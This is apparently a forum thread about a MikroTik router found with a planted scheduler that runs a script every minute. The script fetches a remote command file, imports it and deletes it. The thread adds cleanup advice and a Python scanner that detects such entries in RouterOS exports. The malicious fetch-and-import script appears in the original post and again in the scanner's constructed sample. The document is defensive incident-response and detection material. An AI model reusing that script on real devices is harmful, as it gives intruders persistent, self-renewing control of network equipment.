During a check of one of our router backups, we found this script:

    add dont-require-permissions=no name=fetch owner=god policy=\
        ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/\
        tool fetch url= :delay 10 /import file-n\
        ame=command.scr :delay 30 /file remove command.scr"
    add interval=1m name=fetch1m on-event=fetch policy=\
        ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \

We have tried to download this file "command.scr"; when we run it, it's only an HTML file.
We are blocking access using /ip/services, with a non-standard port and only certain IPs allowed to access the router.
We have disabled access to the router except from certain IPs (office). If we are outside the office, we need to do L2TP before we can log in to the router.
We also do a weekly backup to FTP.

Which kind of VPN are you using for this access?

    export hide-sensitive file=anynameyouwish

It does look like someone has had (still has?) access to your device.
Block all external access to that device (pull the WAN cable out, sorry for that, but it's needed).
Review any other script/auto-setting/whatever still available in Files.
Review your logs for admin and VPN access.
Change the password of the admin user (better: make a new user with admin rights and REMOVE the default admin user).
Review your firewall (enable logging for all possible open ports until you identify the open door).
Connect WAN again and regularly investigate logs for admin/VPN access.
Obviously someone is able to get in one way or the other, so investigate those logs and firewall settings carefully.
Do NOT import any settings/scripts from the old environment without having seen every single line.
Factory reset that router and start again.
You could use a script to have them mailed to you periodically.
Others will surely chime in with alternative (better) suggestions.

Very strange story, and probably we are not getting the full context here. So IF he effectively netinstalled an infected one, deployed 6.47/6.48/6.49 on it, created strong usernames/passwords and locked down services, and it STILL gets infected?!

Don't trust a thing.
This can only mean (I think) that one way or the other the malicious code is already inside AND is somehow being used to re-infect those routers.
Download ALL packages needed for the reinstall anew; if possible, do so from a device not on your network.
Do not have these newly installed routers make management connections to internal resources (only traffic, obviously). Not even your backups!
Do not reuse anything which comes from an internal source.
If possible, allow (temporarily) only MAC management access to such a router using one of the eth ports.
A freshly installed router with a proper firewall and proper admin access can normally not be hacked.
If you say you already handled a couple of routers and they get re-infected, start over with a couple and put very close monitoring on those devices to see when and how it happens again.

There is information about Windows malware that knows how to connect to an MT router with the default password and make configuration changes to add it to a botnet.

So "admin" with no password on the local network is not safe anymore. Well, this has to be changed by MikroTik anyway, as from 2024 it will be forbidden to sell devices in the EU in the state they are in now (standard default password). Other manufacturers are already selling devices with the default password printed on a sticker, not derived from the MAC address or serial number.

Some recent "pre-configured" MikroTik devices have this as well, but the password is lost on a factory reset.
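Added example (mine, not code posted by anyone in this thread): a small scanner for the text of a RouterOS `/export` that undoes the export's backslash line wrapping, parses the `add` entries under `/system script` and `/system scheduler`, and flags a script whose source both fetches and imports a file together with the scheduler that fires it. It serves both the scheduler/script pair the original poster found in the backup and the advice above to review every script and auto-setting rather than trusting the old configuration. The sample export, the `placeholder.invalid` URL (the thread never showed the real one), the benign `weekly-export` entries and the five-minute "fires too often" threshold are all constructed for illustration.

```python
"""Scan RouterOS '/export' text for self-reinstalling fetch/import scripts.

Added example, not from the thread. The sample export, the placeholder URL
and the 5-minute threshold are constructed for illustration.
"""
import re

# Constructed sample modelled on the two 'add' lines found in the backup.
# The first 'add' is a /system script entry, the second a /system scheduler
# entry that runs it every minute. The URL is a placeholder, not a real host.
SAMPLE_EXPORT = r'''# constructed sample export (not a real device)
/system script
add dont-require-permissions=no name=fetch owner=god policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/\
    tool fetch url=http://placeholder.invalid/command.scr :delay 10 /import file-n\
    ame=command.scr :delay 30 /file remove command.scr"
add dont-require-permissions=no name=weekly-export owner=admin policy=\
    read,write,test source="/export hide-sensitive file=weekly"
/system scheduler
add interval=1m name=fetch1m on-event=fetch policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-date=jan/01/2023 start-time=00:00:00
add interval=1w name=weekly on-event=weekly-export policy=read,write,test \
    start-time=startup
'''

SHORT_INTERVAL = 5 * 60  # constructed threshold: anything firing this often gets reviewed


def join_continuations(text):
    """A trailing backslash joins the next line minus its indentation,
    so 'file-n\\' followed by '    ame=' becomes 'file-name='."""
    lines, buf = [], None
    for raw in text.splitlines():
        cur = raw if buf is None else buf + raw.lstrip()
        if cur.endswith("\\"):
            buf = cur[:-1]
        else:
            lines.append(cur)
            buf = None
    if buf is not None:
        lines.append(buf)
    return lines


def parse_add_line(line):
    """Turn 'add k=v k2="quoted \\" value"' into a dict. Backslash escapes
    inside quotes are honoured; bare flags without '=' are ignored."""
    fields, i, n = {}, 4, len(line)
    while i < n:
        while i < n and line[i] == " ":
            i += 1
        eq = line.find("=", i)
        if i >= n or eq == -1:
            break
        key, i = line[i:eq], eq + 1
        if i < n and line[i] == '"':
            i, val = i + 1, []
            while i < n and line[i] != '"':
                if line[i] == "\\" and i + 1 < n:
                    i += 1
                val.append(line[i])
                i += 1
            i += 1  # closing quote
            fields[key] = "".join(val)
        else:
            j = line.find(" ", i)
            j = n if j == -1 else j
            fields[key] = line[i:j]
            i = j
    return fields


def parse_export(text):
    """Group 'add' entries by the '/path' section line that precedes them."""
    entries, section = {}, None
    for line in join_continuations(text):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if s.startswith("/"):
            section = s
        elif s.startswith("add ") and section:
            entries.setdefault(section, []).append(parse_add_line(s))
    return entries


def interval_seconds(text):
    """RouterOS intervals appear as '1m', '1d2h', '00:01:00' or '1d00:01:00'."""
    if ":" in text:
        days, hms = 0, text
        if "d" in hms:
            d, hms = hms.split("d", 1)
            days = int(d)
        h, m, s = (int(p) for p in hms.split(":"))
        return days * 86400 + h * 3600 + m * 60 + s
    units = {"w": 604800, "d": 86400, "h": 3600, "m": 60, "s": 1}
    return sum(int(n) * units[u] for n, u in re.findall(r"(\d+)([wdhms])", text))


FETCH = re.compile(r"\bfetch\b")
IMPORT = re.compile(r"/import\b")


def find_suspicious(text):
    """Return (kind, name, reason) for scripts that download-and-import and for
    schedulers that run them or fire unusually often."""
    cfg = parse_export(text)
    findings, bad = [], set()
    for s in cfg.get("/system script", []):
        src = s.get("source", "")
        if FETCH.search(src) and IMPORT.search(src):
            bad.add(s.get("name"))
            findings.append(("script", s.get("name"), "downloads and imports a remote file"))
    for sch in cfg.get("/system scheduler", []):
        ev, secs = sch.get("on-event", ""), interval_seconds(sch.get("interval", "0s"))
        if ev in bad or (FETCH.search(ev) and IMPORT.search(ev)):
            findings.append(("scheduler", sch.get("name"), f"runs fetch/import every {secs}s"))
        elif 0 < secs <= SHORT_INTERVAL:
            findings.append(("scheduler", sch.get("name"), f"fires every {secs}s; review on-event"))
    return findings


if __name__ == "__main__":
    for kind, name, reason in find_suspicious(SAMPLE_EXPORT):
        print(f"{kind:9} {name:14} {reason}")
```

Run it against the text of `export hide-sensitive file=...` taken from each rebuilt router (the export a poster above suggests mailing periodically); the benign weekly export script in the sample is not reported, while the `fetch` script and its one-minute `fetch1m` scheduler are. The same parser can be extended to other sections of the export, which is why section names are kept as the dictionary keys.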